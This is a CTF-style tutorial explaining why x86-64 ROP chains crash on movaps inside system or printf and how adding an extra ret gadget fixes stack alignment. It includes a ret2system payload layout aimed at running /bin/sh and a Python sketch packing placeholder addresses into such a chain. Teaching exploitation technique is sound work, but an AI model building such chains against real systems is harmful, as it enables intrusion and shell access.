16-Byte Alignment
In the world of Pwn, 16-byte alignment (Stack Alignment) is a beginner’s “number one killer.” You may have built a perfect ROP chain with flawless logic, yet when you run it locally or attack a remote target, the program mysteriously crashes with SIGSEGV (segmentation fault) inside system or printf.
It feels like you prepared a master key, only to find the lock won’t open because the core is off by 1 millimeter.
1. Why does this rule exist? (Hardware’s “OCD”)
This rule comes from the x86-64 SSE (Streaming SIMD Extensions) instruction set.
For maximum performance, code that moves 128-bit (16-byte) data (such as packed floating-point values) uses instructions like movaps (Move Aligned Packed Single-Precision Floating-Point Values).
- Unwritten rule: movaps requires the memory address being operated on to be divisible by 16 (that is, the last hexadecimal digit of the address must be 0).
- Consequence: If the address is not aligned, the CPU refuses to execute the instruction and raises an exception, which Linux delivers to the program as SIGSEGV.

Modern glibc functions (such as printf and system) make heavy use of these instructions internally for optimization.
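The divisibility rule above can be sketched as a one-line check. This is only an illustration: the helper name `is_16_byte_aligned` and the sample addresses are made up for this example.

```python
def is_16_byte_aligned(addr: int) -> bool:
    """Return True when addr is a multiple of 16 (its low 4 bits are all zero)."""
    return addr & 0xF == 0


# Hypothetical stack addresses, chosen only to show both outcomes.
for addr in (0x7FFDE0001230, 0x7FFDE0001238):
    verdict = "fine for movaps" if is_16_byte_aligned(addr) else "movaps would fault"
    print(f"{addr:#x}: {verdict}")
```

Checking the low four bits is the same as checking that the last hexadecimal digit is 0.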
2. The “dynamic changes” of 16-byte alignment
This is the part that most easily confuses people. According to the System V ABI standard:
Before executing the call instruction, the stack pointer RSP must be 16-byte aligned.
Let’s track how the stack changes:
- Before the call: RSP = 0x...00 (16-byte aligned, address ending in 0).
- Execute call: The CPU automatically pushes the return address (8 bytes) onto the stack.
  - At this point, RSP becomes 0x...F8 (no longer a multiple of 16, offset by 8 bytes).
- Enter the function body: The first instruction of the function is usually push rbp.
  - At this point, RSP becomes 0x...F0 (hey! back to being a multiple of 16).
Conclusion: While executing logic inside the function body, the compiler assumes by default that RSP is aligned. But if you jump directly to the start of the function by special means (such as ROP), the situation is different.
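The three steps above can be replayed with plain arithmetic. This is a rough sketch, not a CPU model: the starting RSP value is hypothetical, and `call` and `push` only model the effect on the stack pointer.

```python
def call(rsp: int) -> int:
    """call pushes an 8-byte return address, so RSP drops by 8."""
    return rsp - 8


def push(rsp: int) -> int:
    """push stores one 8-byte register, so RSP drops by 8."""
    return rsp - 8


rsp = 0x7FFDE0001200  # hypothetical value, 16-byte aligned before the call
steps = [("before call", rsp)]
rsp = call(rsp)
steps.append(("after call", rsp))
rsp = push(rsp)
steps.append(("after push rbp", rsp))

for label, value in steps:
    print(f"{label:<15} rsp={value:#x}  rsp % 16 = {value % 16}")
```

The remainders come out as 0, 8, 0, which is the aligned, unaligned, aligned pattern described in the list.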
3. A Pwn player’s nightmare: the alignment pit in a ROP chain
When you build a ROP chain, you are effectively manually “stitching together” return addresses.
Typical failure case:
You found the address of system and prepared pop rdi; ret for argument passing. Your payload looks like this:
[padding] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]
In this process, you skip the normal call flow and jump directly into system via ret. If the chain leaves RSP 8 bytes away from where a real call would have put it, the stack frame that system sets up is misaligned (at the faulting instruction, RSP ends in 8 instead of 0), and as soon as system executes movaps on a stack operand, it crashes immediately.
4. The ultimate remedy: add one more ret
If you find that your ROP chain crashes when calling system, and debugging shows it dies on movaps, the simplest black magic is: before calling the target function, insert a useless ret instruction.
Fixed payload:
[padding] + [ret_gadget] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]
- Principle: The essence of ret is pop rip. Executing one extra ret moves RSP by 8 bytes, achieving a gorgeous transition “from unaligned to aligned.”
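Here is a minimal sketch of both payloads, using only the standard library, that also estimates where RSP lands when system is entered. Every address is a placeholder invented for this example; real values come from the target binary and libc. The padding is left out because its length depends on the target. The sketch assumes the vulnerable function was itself called normally, so RSP ends in 8 when its ret executes.

```python
import struct

# Placeholder addresses, NOT taken from any real binary.
POP_RDI_RET = 0x401233
RET_GADGET = 0x40101A
BIN_SH_ADDR = 0x404060
SYSTEM_ADDR = 0x401050


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value, as the stack expects on x86-64."""
    return struct.pack("<Q", value)


def build_chain(align: bool) -> bytes:
    """Build the part of the payload that starts at the saved return address."""
    chain = p64(RET_GADGET) if align else b""
    return chain + p64(POP_RDI_RET) + p64(BIN_SH_ADDR) + p64(SYSTEM_ADDR)


def rsp_at_target_entry(rsp_at_first_ret: int, chain: bytes) -> int:
    """Each 8-byte slot is consumed by one ret or pop, and each adds 8 to RSP."""
    return rsp_at_first_ret + len(chain)


def entry_matches_abi(rsp: int) -> bool:
    """After a real call, RSP at function entry is 8 modulo 16."""
    return rsp % 16 == 8


rsp0 = 0x7FFDE0001238  # hypothetical RSP when the vulnerable function executes ret
for align in (False, True):
    entry = rsp_at_target_entry(rsp0, build_chain(align))
    print(f"extra ret={align}: rsp at system entry={entry:#x}, ok={entry_matches_abi(entry)}")
```

Under these assumptions the three-slot chain enters system with RSP ending in 0, which is not what a real call produces, and the four-slot chain with the extra ret restores the expected value ending in 8.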
5. How do you identify it while debugging?
In GDB (for example, using the pwndbg plugin), when you crash:
- Look at the instruction where it crashed and check whether it is something like movaps XMMWORD PTR [rsp+...], xmm....
- Check the value of RSP and see whether the last digit of the address is not 0 (for example, it is 8).
- If both are true, case closed: this is a 16-byte alignment problem.
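The checklist above can be turned into a small heuristic. This is only a sketch: the function name is hypothetical, the instruction text is assumed to be copied by hand from the debugger, and the check only covers operands addressed through rsp (a frame addressed through rbp would need the same test on RBP). movapd and movdqa are included because they have the same alignment requirement as movaps.

```python
import re

# SSE moves that fault on a memory operand that is not 16-byte aligned.
ALIGNED_SSE_MOVE = re.compile(r"^\s*(movaps|movapd|movdqa)\b", re.IGNORECASE)


def looks_like_alignment_crash(faulting_insn: str, rsp: int) -> bool:
    """Heuristic: aligned SSE move on a stack operand while RSP is not a multiple of 16."""
    is_aligned_move = ALIGNED_SSE_MOVE.match(faulting_insn) is not None
    uses_stack_operand = "rsp" in faulting_insn.lower()
    return is_aligned_move and uses_stack_operand and rsp % 16 != 0


# Hypothetical crash state for illustration.
print(looks_like_alignment_crash("movaps XMMWORD PTR [rsp+0x50], xmm0", 0x7FFDE0001238))
```

A True result is a strong hint, not proof. It is still worth confirming that the crash disappears once the extra ret is added.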
Summary Notes
| State | RSP State | Notes |
|---|---|---|
| Before a standard Call | Must be aligned (ends in 0) | Mandatory ABI requirement |
| After executing Call | Unaligned (ends in 8) | Because an 8-byte return address was pushed |
| Crash after ROP jump | Usually ends in 8 | Causes SIMD instructions inside system to fail |
| Alignment strategy | Add one ret instruction | Force a shift by 8 bytes to cancel the offset |
Now you understand why sometimes your payload logic is completely correct, yet you still need to mysteriously add one more ret to make it work, right?